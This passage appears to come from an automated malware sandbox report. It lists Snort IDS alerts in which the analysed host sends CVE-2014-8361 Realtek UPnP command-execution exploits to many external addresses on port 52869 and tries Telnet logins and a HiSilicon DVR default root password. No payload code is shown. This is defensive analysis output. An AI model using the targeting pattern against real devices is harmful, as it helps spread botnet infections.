Source: Traffic	Snort IDS: 492 INFO TELNET login failed 93.88.28.185:23 -> 192.168.2.23:48888
Source: Traffic	Snort IDS: 716 INFO TELNET access 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48642 -> 185.245.0.128:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48642 -> 185.245.0.128:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38714 -> 45.123.196.203:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38714 -> 45.123.196.203:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50286 -> 45.115.241.200:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50286 -> 45.115.241.200:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43188 -> 45.248.69.219:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43188 -> 45.248.69.219:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:51292
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 182.71.126.190:23 -> 192.168.2.23:50008
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35952
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35952
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33700
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.184.41.14:23 -> 192.168.2.23:46112
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.184.41.14:23 -> 192.168.2.23:46112
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:51734
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:51734
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54576 -> 185.182.49.136:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54576 -> 185.182.49.136:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60530 -> 45.195.159.188:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60530 -> 45.195.159.188:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33524 -> 45.115.237.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33524 -> 45.115.237.165:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33700
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47496 -> 45.33.241.232:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47496 -> 45.33.241.232:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41138 -> 45.138.69.194:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41138 -> 45.138.69.194:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47576 -> 185.241.252.195:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47576 -> 185.241.252.195:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47580 -> 185.241.252.195:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37576 -> 45.115.241.89:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 119.30.125.89:23 -> 192.168.2.23:34128
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57268 -> 45.117.146.255:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57268 -> 45.117.146.255:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36362 -> 45.42.95.151:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36362 -> 45.42.95.151:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57280 -> 45.117.146.255:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43114 -> 91.196.177.82:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43114 -> 91.196.177.82:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43116 -> 91.196.177.82:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33830
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:36120
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:36120
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46914 -> 91.78.48.185:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46914 -> 91.78.48.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46920 -> 91.78.48.185:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60562 -> 45.254.26.54:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60562 -> 45.254.26.54:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33830
Source: Traffic	Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.99.192.113:23 -> 192.168.2.23:39268
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56192 -> 45.115.239.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56192 -> 45.115.239.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54188 -> 91.134.128.105:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54188 -> 91.134.128.105:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44928
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44928
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44286 -> 45.115.230.151:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44286 -> 45.115.230.151:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33906
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59516 -> 45.154.3.151:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59516 -> 45.154.3.151:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45684 -> 45.84.91.69:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45684 -> 45.84.91.69:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45720 -> 45.84.91.69:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59278 -> 45.41.92.219:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59278 -> 45.41.92.219:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:33906 -> 211.106.163.145:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60496 -> 91.78.92.2:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60496 -> 91.78.92.2:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60500 -> 91.78.92.2:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37288
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37288
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42414 -> 45.120.184.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42414 -> 45.120.184.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60976 -> 45.33.247.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60976 -> 45.33.247.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42422 -> 45.120.184.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35644 -> 91.77.97.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35644 -> 91.77.97.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35650 -> 91.77.97.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52460 -> 185.65.162.239:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52460 -> 185.65.162.239:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33906
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 177.99.192.113:23 -> 192.168.2.23:39268
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36274 -> 12.45.41.169:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:36274
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:36274
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57762 -> 45.33.247.132:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57762 -> 45.33.247.132:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59036 -> 45.43.239.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59036 -> 45.43.239.57:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37358
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37358
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36068 -> 45.115.236.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36068 -> 45.115.236.166:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56546 -> 45.33.254.144:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56546 -> 45.33.254.144:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 121.184.41.14:23 -> 192.168.2.23:46498
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 121.184.41.14:23 -> 192.168.2.23:46498
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 186.72.40.225:23 -> 192.168.2.23:49738
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 186.72.40.225:23 -> 192.168.2.23:49738
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52502 -> 185.65.162.239:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.99.192.113:23 -> 192.168.2.23:39516
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 82.59.59.187:23 -> 192.168.2.23:60526
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 82.59.59.187:23 -> 192.168.2.23:60526
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52666 -> 185.159.88.230:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52666 -> 185.159.88.230:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47726 -> 45.26.216.149:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47726 -> 45.26.216.149:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54196 -> 45.138.86.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54196 -> 45.138.86.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47740 -> 45.26.216.149:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52034 -> 45.121.56.32:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52034 -> 45.121.56.32:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54220 -> 45.138.86.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35252 -> 185.245.153.210:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35252 -> 185.245.153.210:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35262 -> 185.245.153.210:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:52160
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:52160
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.230.54.11:23 -> 192.168.2.23:52210
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.230.54.11:23 -> 192.168.2.23:52210
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52678 -> 185.159.88.230:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37442
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37442
Source: Traffic	Snort IDS: 716 INFO TELNET access 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56620 -> 91.200.121.176:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 177.99.192.113:23 -> 192.168.2.23:39516
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33478 -> 45.113.163.120:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33478 -> 45.113.163.120:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59420 -> 45.117.146.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59420 -> 45.117.146.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52612 -> 185.65.160.77:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52612 -> 185.65.160.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52622 -> 185.65.160.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56056 -> 45.125.108.165:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56056 -> 45.125.108.165:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39224 -> 45.121.82.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39224 -> 45.121.82.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49382 -> 185.229.200.184:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49382 -> 185.229.200.184:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49440 -> 185.229.200.184:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37654
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37654
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33586 -> 45.115.238.200:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33586 -> 45.115.238.200:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45342 -> 45.125.109.243:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45342 -> 45.125.109.243:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:52076
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41784 -> 45.43.227.59:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41784 -> 45.43.227.59:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48424 -> 185.19.81.228:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48424 -> 185.19.81.228:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48428 -> 185.19.81.228:52869

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 47692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52122 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52122
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52126
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42038 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52784 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52786 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52784
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 52786
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45784 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45862 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45708 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45708
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45714
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59310 -> 52869
